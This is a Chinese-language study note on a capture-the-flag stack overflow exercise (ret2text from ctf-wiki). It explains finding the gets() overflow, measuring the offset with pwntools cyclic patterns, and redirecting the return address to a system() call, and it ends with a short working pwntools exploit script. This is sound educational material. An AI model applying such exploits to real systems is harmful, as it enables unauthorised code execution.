pwn by example学习笔记(一)
通过一些例子来学习pwn,这些例子来自于github上的ctf-wiki pwn部分
栈溢出原理(示例:ret2text)
首先,获取要pwn的程序的基本信息
这个程序是Linux下32位的elf格式的可执行文件,没有开启栈(stack)保护机制,没有开启nx
了解了程序的基本信息以后,就运行下程序
发现只有输入和输出,而且就只有一个输入点。
放到ida里面去跑一下
可以看到,gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取
我们需要明确的知道输入到第多少位的时候可以覆盖到返回地址。
这里使用cyclic(pwntools中的一个插件)以使用cyclic pattern来找到return address的位置
Cyclic pattern是一个很强大的功能,大概意思就是,使用pwntools生成一个pattern,pattern就是指一个字符串,可以通过其中的一部分数据去定位到他在一个字符串中的位置。
在我们完成栈溢出题目的时候,使用pattern可以大大的减少计算溢出点的时间。 比如,我们在栈溢出的时候,首先构造cyclic(0x100),或者更长长度的pattern,进行输入,输入后pc的值变味了0x61616161,那么我们通过cyclic_find(0x61616161)就可以得到从哪一个字节开始会控制PC寄存器了,避免了很多没必要的计算。
下面要知道可以利用的控制的返回地址
分析程序发现,有system( )函数,可以利用。
用这个地址(0x804863a)来覆盖栈上的返回地址
可以看到该漏洞被成功利用了,成功执行了shell
附exp:
from pwn import *
p = process('./ret2text')
address = 0x804863a
payload = 'a'*112+p32(address)
p.sendline(payload)
p.interactive()